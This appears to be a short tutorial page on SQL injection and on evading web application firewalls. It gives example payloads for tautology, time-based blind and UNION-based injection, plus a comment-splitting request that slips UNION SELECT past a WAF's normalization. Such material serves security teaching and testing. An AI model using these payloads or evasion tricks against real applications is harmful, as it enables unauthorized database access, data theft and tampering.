SQL Injection Bypassing WAF

SQLi
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of  injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL Injection – Basic Concepts
There are two types of SQL Injection • SQL Injection into a String/Char parameter Example: SELECT * from table where example = 'Example'

• SQL Injection into a Numeric parameter Example: SELECT * from table where id = 123


 * 1) Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions.

• A vulnerable request can get into Insert, Update, Delete, etc. Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

Example: select * from table where id = 1 AND if((ascii(lower(substring((select user),$i,1))))!=$s,1,benchmark(200000,md5(now)))
 * 1) Blind SQL Injection

Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
 * 1) Exploitation features for various DBMSs

Bypassing WAF: SQL Injection - Normalization Method Example Number (1) of a vulnerability in the function of request normalization • The following request doesn’t allow anyone to conduct an attack /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*